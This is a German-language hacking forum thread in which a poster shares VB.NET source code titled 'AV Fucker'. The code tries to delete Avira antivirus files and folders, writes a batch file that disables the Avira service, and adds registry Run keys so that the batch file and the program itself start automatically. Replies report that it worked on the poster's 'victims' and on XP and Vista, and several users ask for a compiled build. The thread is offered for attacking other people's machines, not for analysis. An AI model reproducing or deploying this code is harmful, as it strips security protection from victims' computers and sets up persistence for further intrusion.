[VB.NET] AV Fucker

So habe grade mal was geschrieben.
Es sollte spätestens wenn das Opfer Adminrechte hat nach den Neustart klappen.

Code:

---

Imports System.IO ' wird für den streamwriter benötigt
Public Class Form1

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

        'versucht die .dlls im avira ordner zu löschen
        Try
            IO.File.Delete(Environment.SpecialFolder.Programs & "\avira\antivir desktop\" & "\*.dll*")
            Application.DoEvents()
        Catch ex As Exception

        End Try
        Try
            'Versucht den Ordner Avira zu löschen
            IO.Directory.Delete(Environment.SpecialFolder.Programs & "\avira")
            Application.DoEvents()
        Catch ex As Exception

        End Try
        'erstellt ne cmd im ordner tmp um den Antirservice zu killen klappt aufjedenfall nach dem neustart des systems
        Try
            Dim swriter = New StreamWriter(Environ("tmp") & "\avira.cmd")
            swriter.WriteLine("@echo off")
            swriter.WriteLine("sc.exe config AntiVirService start= disabled")
            swriter.Close()
            'startet die avira.cmd
            Process.Start(Environ("tmp") & "\avira.cm")
        Catch ex As Exception

        End Try
        'macht einen registry eintrag für den autostart der avira.cmd
        Try
            Dim regpfad As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
            Dim regname As String = "AVFuck"
            Dim filepfad As String = Environ("tmp") & "\avira.cmd"

            My.Computer.Registry.SetValue(regpfad, regname, filepfad, _
                                          Microsoft.Win32.RegistryValueKind.String)
        Catch ex As Exception
        End Try
        Try
            'Löscht den eintrag für das trayicon von avira
            My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "avira", "", _
                                          Microsoft.Win32.RegistryValueKind.String)
        Catch ex As Exception

        End Try
        'schreibt einen registry autostart eintrag für die anwendung
        Try
            Dim regpfaddatei As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
            Dim regnamedatei As String = "AVFuckstarter"
            Dim filepfaddatei As String = Application.ExecutablePath

            My.Computer.Registry.SetValue(regpfaddatei, regnamedatei, filepfaddatei, _
                                          Microsoft.Win32.RegistryValueKind.String)
        Catch ex As Exception

        End Try
        End
    End Sub
End Class

---

was der Code macht steht dabei.

mfG

Ah.. thx. Sowas in der art hab ich gesucht :)

jo wenn das nun auch noch funzt =) dann DANKE XD

Also bei einem meiner Vics ist AV sofort beendet worden und der service war auch bein neustart immer noch zu.
das trayicon war weg joa.^^

und bei mir bei XP gings auch da war der servive jedoch erst nach dem neustart vollständig beenden wie das trayicon.

mfG

So wie ich das sehe geht das aber auch nur wenn man avira im standart ordner installiert hat.

Nein es geht auch in anderen Ordner da die avira.cmd eigentlich nur entscheident ist ;)

Das löschen würde nicht gehen aber Avira ist trotzdem down.

mfG

Kann das mal bitte einer compilieren udn uppen?

also ich find das teil geil!
funkzt auch unter vista wie ich es mir erhofft habe (durch´s lesen^^)
mfg

----------
edit :
nur das mit der registry kann ich bemängeln in vista =)
edit ende
---------

Compilieren &nd Uppen pls :[

Ich arbeite mit VB6 :p

Und hab auch nach sowas gesucht

@yazzn

1.ist es vb.net
2. der code steht da warum sollte ich es compilen und uppen ?
3.wenn du in vb6 codest dann wird dir der compilte code nichts bringen , wenn du daraus lernen willst ist der opensource besser.


mfG